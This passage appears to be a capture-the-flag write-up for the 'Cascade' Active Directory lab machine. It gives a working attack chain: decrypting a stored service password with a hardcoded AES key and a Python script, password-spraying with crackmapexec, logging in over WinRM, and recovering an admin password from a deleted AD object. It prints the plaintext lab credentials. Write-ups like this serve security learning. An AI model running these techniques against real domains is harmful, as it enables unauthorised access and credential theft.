Manager                            :
MemberOf                           : {CN=Audit Share,OU=Groups,OU=UK,DC=cascade,DC=local, CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local, CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local}
MNSLogonAccount                    : False
MobilePhone                        :
Modified                           : 7/30/2023 12:42:59 PM
modifyTimeStamp                    : 7/30/2023 12:42:59 PM
msDS-User-Account-Control-Computed : 0
Name                               : Steve Smith
nTSecurityDescriptor               : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                     : CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
ObjectClass                        : user
ObjectGUID                         : 38ebd9df-c4f7-4d00-9a9f-f503432ffa7d
objectSid                          : S-1-5-21-3332504370-1206983947-1165150453-1107
Office                             :
OfficePhone                        :
Organization                       :
OtherName                          :
PasswordExpired                    : False
PasswordLastSet                    : 1/28/2020 7:58:05 PM
PasswordNeverExpires               : True
PasswordNotRequired                : False
POBox                              :
PostalCode                         :
PrimaryGroup                       : CN=Domain Users,CN=Users,DC=cascade,DC=local
primaryGroupID                     : 513
ProfilePath                        :
ProtectedFromAccidentalDeletion    : False
pwdLastSet                         : 132247150854857364
SamAccountName                     : s.smith
sAMAccountType                     : 805306368
ScriptPath                         : MapAuditDrive.vbs
sDRightsEffective                  : 0
ServicePrincipalNames              : {}
SID                                : S-1-5-21-3332504370-1206983947-1165150453-1107
SIDHistory                         : {}
SmartcardLogonRequired             : False
sn                                 : Smith
State                              :
StreetAddress                      :
Surname                            : Smith
Title                              :
TrustedForDelegation               : False
TrustedToAuthForDelegation         : False
UseDESKeyOnly                      : False
userAccountControl                 : 66048
userCertificate                    : {}
UserPrincipalName                  : s.smith@cascade.local
uSNChanged                         : 340151
uSNCreated                         : 16404
whenChanged                        : 7/30/2023 12:42:59 PM
whenCreated                        : 1/9/2020 6:08:13 PM

we see that the user is part of the audit share group and we also see that the user has been assigned a certain script called 

MapAuditDrive.vbs

to access this script by default AD scripts are stored in  a share called \\NETLOGON so lets access it... 

after accessing it we see it mostly pointing to the shares that are in the Audit share... and when we go into the Audit share as the user s.smith we see a database in which we first of all access using sqlite3 and we get the creds belonging to a certain ArkSvc the cred is base64 encoded... its:
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
BQO5l5Kj9MdErXx6Q6AGOw==

SQLite version 3.42.0 2023-05-16 12:36:15
Enter ".help" for usage hints.
sqlite> .table
DeletedUserAudit  Ldap              Misc            
sqlite> select * from DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> select * from Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> select * from Misc;

when we try to base64 decode the string we are not able to do so... unfortunately this is because there might be some sort of encryption preventinbg us from being able to achieve success....


so we continue... by checking the files that were available in the share Audit they might have intel on how we can get the password... when we check the runaudit.dll we see that it executes the:

CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"

and on executing it the pe file interacts with the Audit.db database... which means that maybe it interacts with the password inside the audit.db 

now on using dnSpy to decompile the binary we are able to see that it uses the key c4scadek3y654321

from;
// CascAudiot.MainModule
// Token: 0x0600000F RID: 15 RVA: 0x00002128 File Offset: 0x00000328
[STAThread]
public static void Main()
{
	if (MyProject.Application.CommandLineArgs.Count != 1)
	{
		Console.WriteLine("Invalid number of command line args specified. Must specify database path only");
		return;
	}
	checked
	{
		using (SQLiteConnection sqliteConnection = new SQLiteConnection("Data Source=" + MyProject.Application.CommandLineArgs[0] + ";Version=3;"))
		{
			string str = string.Empty;
			string password = string.Empty;
			string str2 = string.Empty;
			try
			{
				sqliteConnection.Open();
				using (SQLiteCommand sqliteCommand = new SQLiteCommand("SELECT * FROM LDAP", sqliteConnection))
				{
					using (SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader())
					{
						sqliteDataReader.Read();
						str = Conversions.ToString(sqliteDataReader["Uname"]);
						str2 = Conversions.ToString(sqliteDataReader["Domain"]);
						string encryptedString = Conversions.ToString(sqliteDataReader["Pwd"]);
						try
						{
							password = Crypto.DecryptString(encryptedString, "c4scadek3y654321");
						}
						catch (Exception ex)
						{
							Console.WriteLine("Error decrypting password: " + ex.Message);
							return;
						}
					}
				}
				sqliteConnection.Close();

this exists in the mainmodule of the pe...

and the decrypting function that contains the algorithm is external and is  also obtained by using dnspy to decompile the CascCrypto.dll

and we see the algorithm used as:



using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace CascCrypto
{
	// Token: 0x02000007 RID: 7
	public class Crypto
	{
		// Token: 0x06000012 RID: 18 RVA: 0x00002290 File Offset: 0x00000690
		public static string EncryptString(string Plaintext, string Key)
		{
			byte[] bytes = Encoding.UTF8.GetBytes(Plaintext);
			Aes aes = Aes.Create();
			aes.BlockSize = 128;
			aes.KeySize = 128;
			aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
			aes.Key = Encoding.UTF8.GetBytes(Key);
			aes.Mode = CipherMode.CBC;
			string result;
			using (MemoryStream memoryStream = new MemoryStream())
			{
				using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateEncryptor(), CryptoStreamMode.Write))
				{
					cryptoStream.Write(bytes, 0, bytes.Length);
					cryptoStream.FlushFinalBlock();
				}
				result = Convert.ToBase64String(memoryStream.ToArray());
			}
			return result;
		}


the cipher mode = cbc as we see and the algorithm is 
1tdyjCbY1Ix49842

using these details we can make a script that decrypts the password that we had got where the 

key = c4scadek3y654321
algorithm = 1tdyjCbY1Ix49842

mode =1 cbc

and the password to be decoded is BQO5l5Kj9MdErXx6Q6AGOw==


using the script:
from base64 import b64decode
from Crypto.Cipher import AES

def decrypt_password(ciphertext, key, algorithm, mode):
    cipher = AES.new(key.encode(), algorithm, mode)
    decoded_ciphertext = b64decode(ciphertext)
    decrypted_text = cipher.decrypt(decoded_ciphertext).decode('utf-8')
    return decrypted_text.rstrip('\0')

def main():
    ciphertext = "BQO5l5Kj9MdErXx6Q6AGOw=="
    key = "c4scadek3y654321"
    algorithm = AES.MODE_CBC
    mode = b'1tdyjCbY1Ix49842'

    decrypted_password = decrypt_password(ciphertext, key, algorithm, mode)
    print("Decrypted Password:", decrypted_password)

if __name__ == "__main__":
    main()
we decode the password and we find its....

 python3 dec1.py
Decrypted Password: w3lc0meFr31nd

someone can also just debug the program and put a breaking point at the place where it decrypts the password and retrieve the password too

now with the password we have obtained we use cme to password spray 

crackmapexec smb  10.10.10.182 -u users.txt -p w3lc0meFr31nd --continue-on-success
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\administrator:w3lc0meFr31nd STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\CascGuest:w3lc0meFr31nd STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\krbtgt:w3lc0meFr31nd STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\arksvc:w3lc0meFr31nd 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\s.smith:w3lc0meFr31nd STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\r.thompson:w3lc0meFr31nd STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\util:w3lc0meFr31nd STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\j.wakefield:w3lc0meFr31nd STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\s.hickson:w3lc0meFr31nd STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\j.goodhand:w3lc0meFr31nd STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\a.turnbull:w3lc0meFr31nd STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\e.crowe:w3lc0meFr31nd STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\d.burman:w3lc0meFr31nd STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\BackupSvc:w3lc0meFr31nd STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\j.allen:w3lc0meFr31nd STATUS_LOGON_FAILURE 
SMB         10.10.10.182    445    CASC-DC1         [-] cascade.local\i.croft:w3lc0meFr31nd STATUS_LOGON_FAILURE 

the only successful one is arksvc:w3lc0meFr31nd

lets check  if winrm is  a go

 crackmapexec winrm  10.10.10.182 -u arksvc -p w3lc0meFr31nd            
SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
WINRM       10.10.10.182    5985   CASC-DC1         [+] cascade.local\arksvc:w3lc0meFr31nd (Pwn3d!)

and yes its  a go!!!!!

so we are in as arksvc

now we enumerate once more... about our properties using:

Get-ADUser -identity arksvc -properties *

and we get our properties as the useer arksvc

and we see that arksvc is  a member of the AD Recycle Bin group... in 

MemberOf                           : {CN=Remote Management Users,OU=Groups,OU=UK,DC=cascade,DC=local, CN=AD Recycle Bin,OU=Groups,OU=UK,DC=cascade,DC=local, CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local}

and rememembering the log file we had the otheer time declaring that the user TempAdmin had been deleted... with this information we can try our luck to access the information about the deleted TempAdmin as we also know that the password belonging to the account is same as the default admin password...

Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *

now using this we are capable of retrieving the deleted object TempAdmin that contains information about the account 


and we get:

Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *


accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : TempAdmin@cascade.local
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM

in this info we also see cascadeLegacyPwd
which contains something interesting it looks like its base64 encoded ... lets decode it 

echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles

and we get that as the password of the TempAdmin which  we know is = Admin password... 

now checking with cme we confirm that the user is part of the windows remote management users... this means we can use winrm to login as them.

and now we have logged in as the administrator... 

whoop whoop!!!!!